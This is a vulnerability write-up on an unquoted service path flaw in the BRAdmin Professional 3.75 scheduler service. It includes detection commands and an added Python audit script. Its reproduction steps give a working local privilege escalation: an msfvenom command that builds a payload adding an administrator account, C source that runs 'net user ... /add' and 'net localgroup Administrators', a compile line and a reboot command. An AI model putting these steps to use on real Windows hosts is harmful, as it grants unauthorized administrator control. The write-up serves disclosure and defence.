# BRAdmin Professional 3.75 - Unquoted Service Path

*"BRAdmin Professional 3.75 software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices."*

## Proof Of Concept

The service's binary path contains spaces and is not quoted, so Windows may try `C:\Program Files (x86)\Brother\BRAdmin.exe` before the intended `bratimer.exe`. If a user can place an executable named `BRAdmin.exe` in the `C:\Program Files (x86)\Brother\` directory, that user can obtain local SYSTEM privileges.

For example, a user who has administrative privileges can obtain **`SYSTEM`** privileges through the vulnerable service.

This situation is especially valuable when additional write permission on the `\Brother\` directory has been granted to unprivileged users.

```
#Detection of unquoted service path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """
Brother BRAdminPro Scheduler
BRA_Scheduler                             
C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe                 
Auto


C:\>sc qc BRA_Scheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BRA_Scheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Brother BRAdminPro Scheduler
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```
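
The same check as an added example (not part of the original advisory): a Python audit that parses `sc qc` output like the above, flags unquoted `BINARY_PATH_NAME` values containing spaces, and returns the directories whose write permissions should be reviewed together with the quoted value to set. The `ExampleQuoted` record and all function names are assumptions made for illustration.

```python
import ntpath
import re

# Constructed input: the BRA_Scheduler record uses the values shown on this
# page; the ExampleQuoted record is made up to show a correctly quoted path.
SC_QC_OUTPUT = r"""
SERVICE_NAME: BRA_Scheduler
        BINARY_PATH_NAME   : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleQuoted
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" -run
        SERVICE_START_NAME : LocalSystem
"""

def parse_services(text):
    """Yield (service name, BINARY_PATH_NAME) pairs from `sc qc` output."""
    name = None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "SERVICE_NAME":
            name = value.strip()
        elif key.strip() == "BINARY_PATH_NAME" and name:
            yield name, value.strip()

def audit_path(binary_path):
    """Return (ambiguous candidates, directories to ACL-check, quoted fix)."""
    if binary_path.startswith('"'):
        return [], [], binary_path          # already quoted
    # Assumption: the image ends in .exe; anything after it is arguments.
    m = re.match(r"(.*?\.exe)(\s.*|$)", binary_path, re.IGNORECASE)
    image, args = (m.group(1), m.group(2)) if m else (binary_path, "")
    parts = image.split(" ")
    # At each space Windows may try the text so far with ".exe" appended.
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    dirs = list(dict.fromkeys(ntpath.dirname(c) for c in candidates))
    return candidates, dirs, f'"{image}"{args}'

def audit(text):
    """Map each service with an unquoted, space-containing path to its findings."""
    return {name: audit_path(path) for name, path in parse_services(text)
            if audit_path(path)[0]}

if __name__ == "__main__":
    for service, (candidates, dirs, fix) in audit(SC_QC_OUTPUT).items():
        print(f"{service}: unquoted path, set BINARY_PATH_NAME to {fix}")
        for d in dirs:
            print(f"  check write ACL on: {d}")
```

For `BRA_Scheduler` the directories reported are `C:\` and `C:\Program Files (x86)\Brother`; quoting the binary path removes the ambiguity regardless of the permissions on either.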

### Steps to Reproduce:

1- The user has write privilege on the `\Brother\` directory and creates an msfvenom payload that adds a new local administrator user to the Windows computer.

```
msfvenom -p windows/adduser USER=unsafe PASS=In.line13 -f exe > BRAdmin.exe 
```

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW5zkMBfskxH_VwPbkz%2F-MW606TdKMT5kaEvNWVP%2F1.PNG?alt=media\&token=98b14885-f4be-4636-9b35-88f7bd0957c1)

2- The user then downloads this executable into the `\Brother\` directory and restarts the computer.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW5zkMBfskxH_VwPbkz%2F-MW61MLiQVlXsP-RHuzg%2F2.PNG?alt=media\&token=87daf106-6185-468a-8df4-29a5c10cc971)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW61NnxEi2SLYr2jRfO%2F-MW61SiZLh4N3XUrf6iS%2F3.PNG?alt=media\&token=c49a70bc-fdca-4baa-8fce-58d8b898c61d)

To restart the computer from the command line:

```
shutdown /r /t 0
```

3- After the restart, the `unsafe` user will have been created and added to the local Administrators group.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW62vm1QrzGWWCEVBaQ%2F-MW63ikVCka-O_O1Fz_f%2F4.PNG?alt=media\&token=14d54279-6849-4964-97bf-2630e65aa112)

Windows Defender will detect the `BRAdmin.exe` executable as malicious after the `unsafe` user has been added to the local Administrators group if the target has not properly installed the latest Windows update.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW63joxx3I9hipyVbs1%2F-MW67LrjVf9X8HtXyIAr%2F5.PNG?alt=media\&token=86bb2f61-89e3-4785-a8d7-6c926debe1d0)

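Alternatively, the code below can be used after compiling it with gcc.

```
#include <stdlib.h>

/* Creates a local user and adds it to the local Administrators group. */
int main(void)
{
    /* The commands run with the privileges of the process that starts this binary. */
    system("net user joker j@k3r.. /add & net localgroup Administrators joker /add");
    return 0;
}
```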

`i686-w64-mingw32-gcc addLocalAdmin.c -lws2_32 -o add.exe`

{% embed url="<https://www.exploit-db.com/exploits/49671>" %}

Author: Metin Yunus Kandemir
